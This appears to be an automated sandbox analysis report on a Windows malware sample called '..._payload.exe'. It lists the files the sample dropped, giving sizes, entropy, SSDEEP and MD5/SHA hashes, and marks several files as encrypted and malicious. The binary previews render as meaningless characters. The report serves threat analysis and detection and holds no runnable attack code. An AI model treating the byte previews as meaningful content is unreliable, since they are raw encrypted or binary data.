                                                                                                Preview:@.v..m.em.....P.8Dl...H.[>ZSkJ..v..F..q.8U...~.`.....c.Z..~0..Z......O.B....p...... ,Hh.sG...c......Hw.h'...~>o4......!.Z...e..(...].....J..*..~...s.....".K{..$.L-.P.<.5.M.'..j,a.....HL<..O+........6f.".Gr.....C.{.....M............Wn...&....5.. 2.i.l..|..0l-.....-......LQ_..A.>...f=..M.I4......iO.K.~jtbW.....H.w.}.....}.kx..H..*<....~F...iW..@).)._a...!..jo.?.b....VHF4t..........f....q.....~...osQ..#W;=/#_...Cz.v~..g...V..V.i....8~h...5.\.EK....v...H..hoy..W.....y.....vSm....P.[M.}.!r.f-.7.|.Q.b..[Z..M.1.{.C1...wm..........,fi..-.6F$...P:I...c...&..y..y.....|.d..........Z...Hz?CD...F..r...J...bcB#-Y...|_.:.IHtl.$.A}`wj>g..H.u.O....B.......v...../H$F...;.P.M@..)..C.......#...w..eT.$f.R..Of....1..-n.Fr...u8..q...U......$..SN..N.cRc.2O.N.Rs7....Gj.....'..+8.)..#.V.....d...9d.j.Z..H.*Byh...}w.2../Yk.i`...k.~...<e..L.a..J..,d_+....m.]."..4P...[8.&...{..c.K....j.y..>.....Z....R...4...M.....h..~....&D.]....k...7(...|..W.......L.(n....i/.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2097486
                                                                                                Entropy (8bit):1.1136392054898387
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:Bc0uLzdzeCn2LweeAFa89asA6BMZERohQf6e86rlvCa3FGQcXZMaxDfax7q:BTuPMpNe2jzBMICQTvpYXsq
                                                                                                MD5:759BC9738460EFB4AF6CFC7DB3EC303F
                                                                                                SHA1:0EC70CFCF446EA85005B5F1DB4D9CB1BF798D4AE
                                                                                                SHA-256:95A4C2F7AB897F1321B76D7701F686DDB0284399FE7B56B223BBC1F8614496F7
                                                                                                SHA-512:F4A6185F01EFA9843042CE60FC4C4FF79F590CF19F4F04BD4AB820509D7C3451A99ACD1F5C127E59AAE6AE732F420558FFFF5028E266E9B90D90CE6E449C3103
                                                                                                Malicious:false
                                                                                                Preview:......B.3...H.1...........M.+.Sb.d.h.~.3K.i...L&nC..].......W.\.......{.J..Q..I..q.D*.&....L/.&O.uxuY.}.....\.Q....d...v.y-t...@L%1.....pR...6......H_P-..5..b>.7.q..1.@qfn^.6xl#7S.=K.Z.E...Z.Y`K.Z5.Fz(H...%.5..O.._........F..q.!.....m".....q99H}.k_%...~.a$/I.....:.q.".R$..p...&.i.....t.9........Db&6....^...w....,%..[}J0yH.[.x..c.Fi.[SH.....................i.]..9.......!..pc......Q..uN...n.F#D...._.SU..M...j........k.....j.g.9YU...X...z..|m.Jw..d./[4..Q/..B..8q..|"....1...+...P..5.........M...Z.H.s.."......e...";P5...Z.....|b[!.)..3...0...>...'..H.2kUb.>[5......|.........<......@..^.....s3.Vf_{a..R..Rb_..w......>W.J...g.F.D.0....s......F<Z.........."<...(.......EB"&d|..J.P.AT.....;..7(.W......M`..4..8Y...\R...U..<p0*I3.t.....>Uo.k.......Y.1.\._...s.i...%i..-.....)..w..,.s!.v....,=.-w_.#.+.9<.<.<.k.Vf^.E.k...zi`I.l.t.G..d3s.. ....M>..XQ.R...o.g......-..C9f+_|D..g.J..4....}.rW.i.$ozyl._s...I....Qe..<.Y.M....t.X..e.^@.m...3..12.^........)5.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):16718
                                                                                                Entropy (8bit):7.989103902850556
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:YiogC1SvoSkPswteqH0a3O2fipOV37DqDnJstUOLaq+8gzuqcos7X02rFFJLWzbq:HogcsWa+v/Q7JstUUEgrjk8kXIaQTn
                                                                                                MD5:2AB5ED4210604D44E3A8D1965A1F5A5D
                                                                                                SHA1:8457A507D595421ED25717E247C3C78A9E9E30CF
                                                                                                SHA-256:BB394D80414E42A337B1E5422CD7FD0DCA8BC9BF8A2327FC28F14DBD6CC24996
                                                                                                SHA-512:D575E5F2EF7EDA46DDBC93627728A6C08167A86E928D222894FDDF3D2FBCD81CE5866394CE47D428566703C9B1BE9BA71C2C6B673B21F3F8EB5E723EE0DB7E6F
                                                                                                Malicious:false
                                                                                                Preview:..l...}6....l........X..Ku.]#.d..]].....g..3.5...`...O....J|9...fR..#M....jJ.?...........0.8......~{K.l.I.}..../.[......~..@.5......-i.o.o..Ci].~..j,..K.>?.z......z]....~]*!F3.~...'...`W....p.L..~....}...G..ef..d.....9..>..+$.Z.....S....8XR.f....b.(.r."..ezt.`..N#A.y.5.w......7=.q?....J.M....m.QQU..&2......r...K+#...bu.....RR.5!3..*g.eW..S.h..o\{...G)..E0.&u.b..DGG.....p...u'=.f\[H.Fj.#ZWg7..~b$.fc|8;.>.B..w.-^.x@..0..M......t..A6=..%y..b..E._.V.....Od...IO.;5 `....`si..v..vU?...fH@9..}.b.G}..%'.VN.?R......s.LUl........qk..K.....YwL.]8...T7..|[<.:.=.?Om..-O7.H(..j....zd..K....a.."....M..r...?'..>g.GT+.f.x..8yy...n.u7....|.LN.:..#..O9.j....ph^.bv0...h...............d...(3.Q_..*~..].$g....kW.o.)....pB.j.$.Z..3V...dzi..[{.......:+..g.....F..u.#.(E(..F;...w.f.A...A)M...Q,.e.......a*`.mc.).....Y./'`,*..wQ.."....B..q.r.>...Bc....w...U..M.......!Dz..(.%..;;.'....C@=...;.....b..t9..n`.!....2..+..4|.@..Eq..ml..p.R<j..O.Z..o.......8.j!...B....kZz
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.978721339505529
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:Xw15tsmFWW9Zst06xTs+5n62O2c8CaNqNR2NmORZsH66I+FOj0Dh9B9qmk58:A15+mFWgq7Rsin6ICaNS2LZsa6Sj8vB1
                                                                                                MD5:10EA2DE0C62D643E4DEC7DEC0ABD4835
                                                                                                SHA1:D8B958DE4872D5318157BDDB35DF8A903BF54B4A
                                                                                                SHA-256:A6677007658E054FCA7CE208E9B7F1929C6DF24F335E08ADC1C37442311FF3D0
                                                                                                SHA-512:4BD47812CAC90DF2BB646E37746908D32036966F125A65B8E2DE5F0B4EF8271992E7506A6018BE28B38755216D0E601F67EE5F89F922C5BCF5B395E4F4C82AD3
                                                                                                Malicious:false
                                                                                                Preview:6...@_o$1.3B.f.BP..YE}....h..{9.D*iu9...?..!T....T#.u.';. ....z.T..k...b.(..M.._.`C...o.J}..,N....\..D..}e....`.3d...xuF...+..G~=.@..?O!5c..=FH.d.K.t.B..:............uU.=.h.....W..3..p....})K.-..4.Y..W.8...W..=.....Z..N....N.X.......T.........O2.26]..VZ.G..#S..].?..P"U...)*../)..*5.#.9..t./3...]..Q....zA.+.#.I.@QJ.!...X*.l.(...kE%.,fJ...)xC(...S.............&../k....z6.....O.`.e.2P......9.}..[!.W....JG..r=t..q.q.....-.%..io.._...e^..1cs.}...,.z.....'.~OQ..gx.....F.1.....5....a.........c.^..'..$m.!.~#*..>..M.Brw...kl.*....a..Y....cUiR.p...<\%.....&6...._<b..~..XqT_)2L..._..b....Q.....2|...Bm7..m..J..\l..:|.@..Z......h...4..=WiC........... ...l.'w..j+....N.l.bs...aa..Ey.?.....G.....K..\.....9...4..I.~|K....E...A.....f.FxGtRQ$x..C......q.w$:V.o...B..9.....c...`5..q......Q4.Zk6....=nmA...p.U...X'..|F.....9.x......>....by....m..lf.4n.l_..A.w.~TZ.y1[.Y....%.......=.\R|r.60L=.*.].(..g.......,Hi..;.<..!.....Q.D.,....o...zgl.b.. >..l...G.....e.%(
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):524622
                                                                                                Entropy (8bit):3.207088643320006
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:MokqdS2GSrjksCW/qFwX9wCksMuCb8OYRTG:MokqA2GgkrwX9wCbnCbmy
                                                                                                MD5:8040D1D35E4B335FEA72D7E76BEDABE3
                                                                                                SHA1:717E1042AEF275817B1D4B3754F50F9F17E0F624
                                                                                                SHA-256:718D3E0BA5D731C1E22E350284F77C05DACC244375E2A5D77B899818DD0428C4
                                                                                                SHA-512:FBBC35E06485504FDF06AE2FB5B701D21C725FB95F83224D818C6D9073047F1B18AEDDD1532E6BE82E9242786B4C2D866878E856D9D08C5DC09F6E45E985B077
                                                                                                Malicious:false
                                                                                                Preview:u.,I.C....9.0...4....i.%.4.....4...7..o...@.f..%.A.&B0".v.:.b..P.:.Y.........a..T.@.x..a.H.>...7...H..Q....+*..d#..G.....i0...wVv..9.v......%..|..2.E...+.....'.IK.8....D...L...u....yn$.70.9...d.r ..jt,f...l#.+.8w............$......z.q{.....zF....w.S..w.d.6.....S...@....U..<..........$k.R.`.}V......ZaM.+y....[X...0i...0.D.........T.W...f.....i%..=...#...SF;..C..z.(...C.\.,......A........IN.Dq.Ow.e.~%..tC......:.C........t...D.\B2......2..L..4...`..].:s.X..J..y.....?..N...^h.$s....X..x.6..g.j...[$.-).o.j..zs...6.[.}F.Z)....e.Z6.....f....._.[p.A...ZE..?....%+..O.D.D.o...gzj.#.g.....b-t6.......gZ....J.O...+M...f.....!oW......a.95...........n.vC..u..6..^.H@-.c.Qg"d.Y...1.}! .F.)..@..6....b.5.."agzpX(;P..2...J.'......MnX....Ka@....b......^......f.:......\z.;I.6|...z$X.Zr.@..Z{X..BW.X.K.}...|.W.-<...-K.....QE"....N/a.]...F..Kr......A?.V...z........k.y...qj+.K_C ..WP..').R..W...F....S...\.Em.#......V...V:%..r..U..:..4t~.......";..X.j.3t..6...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):524622
                                                                                                Entropy (8bit):3.501686734013129
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:tYtJlCuG+AVBd0NBDh5Q+qD9BlX9AypOUaK+:k4BdEdV+xCUk
                                                                                                MD5:B118F42850B11BF651B4EA8AAB2A52E2
                                                                                                SHA1:A753597B8B958A18EC3DF12E96E8C9B31C6ED593
                                                                                                SHA-256:4264C35D30C4D88761DDBBD160C79B7B981BF6A9DBEB47770E2A2D9896B68E14
                                                                                                SHA-512:BD07FC0874CEBA1BFBF791810C8A404258986E67B772D233192CC732EABDD0E990EAD0A04A5AD9C35FD0A41B03379D409D7BDF938B3418296890168C5D840CF8
                                                                                                Malicious:false
                                                                                                Preview:.......z....{.@...*.O.....x./.|...6.SL. rB.SG.i.....h..M....+m.HKds......<......V..(v..A!.......QEk.8.....h.!.k....Oq7..I.h.Bh......... .......I...l.<...w.6....+..J.......lB{..EJ6.......gy6.K.........S.\...2.......F.nFG.["..}G&.q...H,..#J7.].L#.e.G...]S.b.U.b./.L.i.x.5.E..5?.....Ig9..+......a{.2........(a.n.c.K.{\F..G..2...K..=...<fr.a..g....r.o...i....8>8...<....b\.F.........."F..0O.^q....:....]7{~...-.F}n1d...oA..O.{@.C.vmlgT....a.]...-...y.o........,0..p?.R7.;....N..GCaM.Cr..]....*....u.%...I..5..Gb...$..z..Xu..e..y....v.r....6w.w..zS$.B....r....C".WZ/............6v.v....#.d..0Z..l...2.W..N....N.\4....@X.q0....G1.....Q2.j'7.. ..iB.L....M.........Y.....5..+.....b.$.(.. (h...n..>.$......D.M.gI..RW..:....r.!..}[AMX.,DUt.l...^..l.j.....t.D.+....b...E9....B^..`L.w^.Cu...c.E.A...._.,:.\.g.A+OM....k3.g(....1.aI.....k-d/s.M.".e..W6>W..W.V.SP..........`L......h...N.m....N...[JZ.fW..GT.2/.$h.#..{..#.........y...*0./.2jK..2m... I...F.jxo..p.q....^.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):524622
                                                                                                Entropy (8bit):3.207666468532575
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:jGpvX0w/BVVmJsxxMv2JNOuK9gzMRnl8tj9U42gxbenxTVnw:qpX/vKMNaeMR6e+xinxTm
                                                                                                MD5:09C0D715F5D87818DC783201A0C701EB
                                                                                                SHA1:3AE01A773026BA0FDA63EA9C1200BCE6F1208FFE
                                                                                                SHA-256:E8216D70014213FFEA85EFA606CE9751F44A6B23D5EFF6CF5C46CE9CB593FB11
                                                                                                SHA-512:6390B01A4568942C21924A2E71D13B0EBFA3EED4EBB1487F395135E2282B53B267F9706B1039882FA49987A5D0E30EEC853556504A1B5B9BD26A49C870643EF8
                                                                                                Malicious:false
                                                                                                Preview:.....v......Y....]..G..9..$S.p=._....K....t.....i'...9B..5iN...........h...I..Y.......)....2.....@R.r..n.8.W@u..n.D...o.Z.x......C_...y......'cs.0.J.....JSC3.m.X.....|.}.?.H......HZ....l.6|.Nln..r...jBB.d&..Bv@.,..Ll...j..aD..o..o.."3...).:[..fC...r(.t.-...N@P.`.A.Z.c]..&.u....N.m.kD..1@.g..h...z.y.....Q.!...........5......L....rf.6.....;... .p.+@.....f..s.@....S...rl.V/.\.0.y....Od#......|s..;...OC [i%4.9.j...:.........Tzl..m......B.K.....M... ..<..b..J..(A..8..>.M`...D.;.S...2Fk.Cfz......6..H..O.}...-..[:I...R......R....6t.....i.m>R....{Cd.j..4-...\.'....^......[Z...;......r.Z..ag........R.;.q\...Mf..]....J|y.h...x.s.^(.`O.........B `.._&-.J......$.T.p>u.C\8..*'0t.4.7.....pH.......(....1D.....V".3D.j i$..3........v..?{..he.;.)51....l.......(.,.|.!...U../...R}O.C}.z...I]...$..ff/.UZ th..r...kQ..^z....H.....`..y..j.>.u.HV(..I...]..a.b.....ia.........We......._a20...*....1sH.......Bz._.k>..$..<..z.P`...5...w.xV....f.PY^...:..g.bEC
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):524622
                                                                                                Entropy (8bit):3.208014501581271
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:lk0L9OmnO8NPSQaTBDy/g6xzUbKGAvK0/ac9QZ2Tktik1vJ6:l30V8NKQaTNhLKR/tVfiJ6
                                                                                                MD5:7E5765E70DFD4496A55BA4F0B2C8680D
                                                                                                SHA1:542379827F11C07F5C96EF1C07338EB5B65C3CDA
                                                                                                SHA-256:96E0E2B191DF1A5822C27F66D6D58AE5EB5A691B50462E781E007D0C82978E68
                                                                                                SHA-512:72D1C81D6BBCF5E72DD7428563251D2620ABC84ED3B3FB8459FF9036F9C8BA89C412F94A0EE620DD5CBEAA7CC4B1245BC16081EF10A108D85C80F6EAA7ED92C1
                                                                                                Malicious:false
                                                                                                Preview:.......!..,}.l...K.K'n\$.......:s*A...Wf$...(.....z.......3.AqGj....7D..)y.C(nC...G..,m).[.h.>...Q..d..7.>..6=(...e...5.....r...i.S...`.X0..M...._...(m.jj.J..|&.:.x..O.$'o../.0.|~\...~1!..+..N".5.>..tU72.Rew."..~I....!e=5>..x.X...........eZSb~.]r.cO@t....."..e'...h.[.4.n..+.vjQ..(.#i.....f.....:\.bD!..........Z'Do.*X. .I.bVl.8..R}MF.=i_w1.#!..j........}....U ..4..:.-k|............;...t.d...4dy..`..p T...7.....h6...t._..u%........xl`...Yz$.....A....g.."O........*...57.3.X..Z.'a#E7...%.Y..]..x.....Q...n....g..9z.-...../....<;.........C6p|.'....7......\[...c.$.=h2...%x...,q).)o8..*...`......G..N)..#.;X#.kUr....B.He..c.#Ra.9..r.....P..>.@.9..2..L .DT.GS.>........B.J.H..Oj.?.+\.>O.F,3A...V......rq.9.l.......Xj.J..'CS4N.{...Z._....9.V\.5TQ.I.yI/<._.F.z(FI1....A...X^{..ZCAF..H.g..s^.Gv.<...}.%p8.PoFZ.,.../......'.a..65...r..E..p...&.S...JA^EGM8..=.D.~#Xp..0^.-.{.z5`.....L.nH.<H..iC..F%E.e.E...U.H.b....[..@.k,g....I.J+{J.....G."_.eJR..XQ.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):524622
                                                                                                Entropy (8bit):3.2080361459277533
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:SoVnUEmJPSPcYCQSV1NFkkXJgp/DFR5CifTGDnspE4ZraEtlo:Sz5SEX7N/4DFR5LSDnDqmE0
                                                                                                MD5:3DDA635D49484E221A5D35D6124086E9
                                                                                                SHA1:207862F2B9E07D3EE10D3DAB89808624DD576991
                                                                                                SHA-256:25E349BAAF935A70948FB3ADACCA395C9940E4E36568A0B843A4329452A48FBD
                                                                                                SHA-512:5DB071F076DDB76DFDF68DAB81572D7529F085D9B6EDC5564D94C5F58DF93F8A901EEF2A7FD76CD1ABAFE9B175B07428583985FAEFB38475875C152BD2060524
                                                                                                Malicious:false
                                                                                                Preview:.........I.oc>.........A..{..pV.z........G&'HU...._.l..n.F.U........2}'.(..d.....&W..U..|.7.r...uG.aJ..)A..sJlNPD......rx..%.................l...~.b....qe....f....&n.i='..... I[.L..*....9...............GPM.R^.~.:..:....,5..2....@6.".....{..qy.>...F.W..q?....g!.[,.~2..!...j. .E...V....W.x{,.."-bQ.8.Fg'.....-.........D.ll.....p....B^a.y.x.rq.B.6..:...[.o-..d0S.H.J.h..=.<.U.....G.K........`A.H,..h.T..n.SE.t.........+B...lW..Mg._5......g..Q..L...y........W(.n.1.k.....w..rT.U...l.as......=.........6....M........./b....,i.h...x..#...^.p..K*3..9....@....yZ..N...y...s}u...}_6...<..y'.....d....5.-..s..).....,B...)0.\_.Bs.WW..._.. >."E.Ph.)w.`.5dQ..uv.Ha....q@xe2s....?,9..O..ICOX...%.E.a......Tzk..u@w#.V.]f!.s8..l..f.^..R.T..g".5....?.g............N...;...e...I.y...2.QUV2.Y...>CH.L4....}2...y..R.J........{...@.9....:...K.."..P..9.>.......4.#.s.........Hg.I..\A._.6...y..#.).y.....v`eH..rg%}.6.].$...T..uKs...~O.9.b..ea..P.....a..."..Eh`...=.....#
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):105937
                                                                                                Entropy (8bit):7.998368654159378
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:yB/Xcw3khAxDkMgM+PISQYlbrQ0ASIMtEzcqZj:yBkQDkMwPIKlHQuIMtE5
                                                                                                MD5:30ABAA0172AAC1366DF8C0192DB5A488
                                                                                                SHA1:2F782501887B154D1D62C1E405428597CF5D6C66
                                                                                                SHA-256:BE94FAD83BFE6CB2D9ADFB04FA215B620999D7D1DB61D060F5124FD52FA0EA7A
                                                                                                SHA-512:B93D3C512EAD2A7DCD2F77F47F9F61DCFAD41390F673593964F78E703535F1673EFC36A65A652B7E11AB7AEB0E6B354B9BB7EFD2D1D3AC0F959B7572B96575B7
                                                                                                Malicious:true
                                                                                                Preview:[{"SyPD.F7.)....b..2aA..F.......V#........b..@<..r..S/..+.~.v..0.R....B.@......o2.'~T...W9F.[....v.{.[./.'.E.&+.H.....A.R,....F......,...G.....;Q.../..N..e.r../.D@.v.|....w|i.#( .C-....U.>t..o.#_s._.E.$..........[).y......#RI....Y..,...eN..nz..a..~..K....sK........N3...D.uY,.....R$.!.-..rL....;A..&.J...v.5?.<.C.....[-W.'...0....B..5X..WB..).>.s.oA..C..?1+.9.FR..."Y.....~.R.%Q..!......a4.d.Uv..........y.x...I>..~....g`={...m.E..).$...q'.(.."*.N4.....j.1&.U...K!..d.X.e....kJO....f_...~.OB..g....l.....D....(.h~t..I..SxQ".W.k1}.....h......;r'.......I(u.Yb>.~..kQ..vO.s.><....'^..}..5U].;.M......K...o.....Gs.L\....... .B......u}.~....[[.....8..i.%p..{..I.....k.......z.&.......:....Q..Dz.4.$.Ng....I..].;.H).^...'..gL_....=......D$...]c....G.?..B.....%..6r#..q..U8.$....I...!.g..{..q..Un/....6..s....`.du.......Q......6 j.,6z..........L_....U~G.....v>.n...3G(2k"...4z.).^j.X..F.C-.\...6.tZ....&.....F....J..C..U.fj.z..ua...Za.....(.TBT.../.4...E3...F.JI`.8
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):105937
                                                                                                Entropy (8bit):7.998311101100501
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:RGDUPlz4+MxUkVzolZa5zTOum9bEFP6028u:RGWMxUW8Ha52uGgFP6028u
                                                                                                MD5:E654F825F3FDF1B429333E824E94A833
                                                                                                SHA1:4F4375BAEDD2AF533ECF78DD3ABA857221023EF2
                                                                                                SHA-256:F32E9B43F8294B4A75ED78A3767084D9948A79DF37AD89C31C5DDB900ED331A5
                                                                                                SHA-512:2DFE8A2371866B913464D351FB8C9F7FE43390CE53809F183E55929E3DF3485589F284F7465E918273CB97036DF0E737275F182A56C807A4C2EDAEFF5C34C094
                                                                                                Malicious:true
                                                                                                Preview:[{"Sy..}.....|.x...8...}!k.p.8Z.8.....Y....uZ}..yn..G..4~..Zh..r/..z..mNk4..j.]0.Y...?......&.\..-).g]q.Y.V.L..t.rX...r..G......H......@`;\j.aG.e.8.Vj..X.Z.....3.....h.q(......f^..E.,vy.2....|.u}. DAM....Z.U...4..h..i).r.2U..._WT.......K.[..../.....(.....\w{.a.|.n.[.!....n.{..0cp.H.Z^.}.......?..J$..phF.+w...G..,..#X..2D.3.....=U3-...s.9P<..'xY.k..si..w..%..N4A.ag.,...P.....K....ea.8F...f....t...#.Q.4...E}L.*.^....5[..QI..Q...|.;U|..hF..ew.0.#_..q..:.<...D.....b..O.......yH...L..E..w...-wf.B.&+.f<......t0..X.-].|!......].....*5p'..79........"T.C....%k.."..2...........U.F0Pi. ..e.t.(.B(..;9+%.Y..(.m^.[WG.v.......p.3{......jF..p.%...z...@.^.o..z..5ry.....(_I\.n....0........|.I....n..03..Yb.k..PN.6#... ....?...[.HWR.q6...0...hL.g?.j./.7.(.....>.?.1.]...J.../......AQ..B.Kd#W....*...@.{.#..o<5........ ...=r....}....AA.z.Z...)..Lw....q@.`..4...M~...;.."...\'B)T..s..9..>.@.pX.T>@A.....}............a.%.8m>..D-].....B.(c&/..|.......@...+e1...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):118527
                                                                                                Entropy (8bit):7.998591783238028
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:weaonaRx5suGzQOeAFci9nhkm1bgEs+azQc:weJ4xYIocknMDL
                                                                                                MD5:0F96C483AC4E956FB2724DD326ED4254
                                                                                                SHA1:033A5AFEE6D84EF9FE1A8A515830FD60F320BA97
                                                                                                SHA-256:6B2D0EC0F9FE2FC63F88388C677A301B8DA0252FDBC753215E5B61CEC5C9F7B5
                                                                                                SHA-512:B787C6C55235CE57BC52F8771B570CE246C402282294480CB5BF8D35D376B7494AD62063170A16B4BB2EF97B6DC2E0E94890F2A256860D47D79782360F4959BC
                                                                                                Malicious:true
                                                                                                Preview:[{"Sy..].NB..7\.iEf...Sa..yl.Ap.w...t....#.a..X-'.D,...v..-..i......3.+.2..)?.)^rx.O.k~.lL+ZJ.. @,.0.'}mA[l..z..oqrE^..n...........W.-....p...4..z(b....lK...4u..>;.=}.b....Y*..Y.boU.w.W....cv..A...R(.@%...j.Q....[.>/4Ttec.A*.u6.o..+'G.Pq.A...o...3.2bK-W.d^..Q...V..bn....d.I...}...gR.^|..9e..^.V..p$.;]q..`...5.YJ..!5....vJ.g.y.x...Z.~..K,..u.I5-...KyI.v...)...QD....f....}..*..!WH...{...U[.H'.,.*.&!..ni.d9.C.dL.#m....+.-.(.<..)..c..C.. sx".#.a..`..x.'2.F.eu;..#..~.........:w..CB'\t\..Eu...ji..o.",B..g...)..h..Mk.tM.1gJw..e....[..Q$/.*.=D.-Y....9....c..P.q..>m.H.>..|.*..V...#.R.m.B3..+.........zw~.- ...!.`.PC..5n..a[..r&....o..c.......5..d.Ug..e....hS.u..S&..2.+.K]..@...x .3.}ki&ZTP.p...T9..LG.0.].7^Q1..fG#./..z9i...E.A..Xb.D.m..@.....[...........p.C....gG...5...%.G..5.Um.[...,.G7*rC.$..<NR.c~..Vb......./.....H.....o.q.K\P5'.Ep.G....,..c^8.U.9GZ..'[..I.....:0.f..:.H....$..&i`....o...?$...L[.$.$..)..c..F._]<.50..L.1+.-i}o...................Z..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):118527
                                                                                                Entropy (8bit):7.998316230721118
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:0TLdRgMLCeDeiCEttWezUWaQfcppyvyHrkPZXg:aOCeHEttBaQfcppC5g
                                                                                                MD5:EB9246E9211510F0A4EBE4CCD48E1CD6
                                                                                                SHA1:251734F94BC20802D144058279EA31F592B1D234
                                                                                                SHA-256:5C19B3D1D0E6FAB7A4F730774B9B1B5DC9732DA78B2D68A5EF75FC9A254909C4
                                                                                                SHA-512:8E9D3209526D0297CA6230F16F544D824AFD04AE2EBC9C5F99FC6AB08F1E0841B04C75C15E064F05BB45D924C76C49EEB0C0DAEC023A4C083C42CCD85137E9C0
                                                                                                Malicious:true
                                                                                                Preview:[{"Sy*bH.Cj.sy.g.v..{),._.laN...L../..........z..#.u.Ls.....z.T"........M.C..!.K....h,..).4.v.....]....5.".........F..'....[.?....B.......Yj|...<...M..m.`}:..7lc.yi...x]C.c...0......]13b.Q.w..Up.....p.....(....X4..o<.4.(Ba..|...r..H..........<..].$b~.x..7.,]w.}.f...N,,}2.:..A.;."@pa/....Z'.]..%2.dC^9.Ivb.X......4JO.E..8..T.WX....Ti.5:&0.('..|..f.m.)s.O...O.e.S...i!.....{&.k...0<..*a.>.eXs..gGL......~E@.l.....m..N..&=...3....<...X..x....C:..*A.....xO....A...S.3:.....c...5\.=.-.g{..{r<.~N..-......|.%#.!.. ...)"..=.....7..$l...../......6impM..a......{..wk.kAT..(..v1u.y}.X...k\.....(}u.c.62h.......h~.x)')k....d...M.\.[...47D|o..P.C...O1.Br..(.F*eg9..e|%q..Y..z....)-6.3.u..s.o..gtB...c.~.....@)"MW.;0k.|.H..)[@a>_R..........m..u..22q.......6>mI.....S.Z......#V.ZpKmf.....Y......`>(;.3..9.|'..wpo*.l".. /.$..R..x..*..^..fL..-d..a..sx...;.Q../.....A...n..Q......!...i<r....r..dA.I?L.V.v...m_..|....[..=..O.+..g.7..8.r....-*.....Q.{.5.l..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):118527
                                                                                                Entropy (8bit):7.9983911588164815
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:ldP6BBT/YrjyueCkSpsMEkMygeOJyNZsKCfTmSjdIY+PA:lUDgvyu8SNHGybYBIQ
                                                                                                MD5:C8D136B29BB0D2975829C1C31C3155A9
                                                                                                SHA1:99348E59C177950B34739A53766D74EF6E4B9FEA
                                                                                                SHA-256:D3D77A799FAA66EF220314BD605E2D00451E9361828AB25520C5178D2DD09107
                                                                                                SHA-512:50F2C7226A736406CD1958FD76788FAB6108F4997D5F8948E32EAC835605468E1C39CF63B58B1201157305C8FFD57CE6EC1AD53A9F971BD1DEC447AA532820D9
                                                                                                Malicious:true
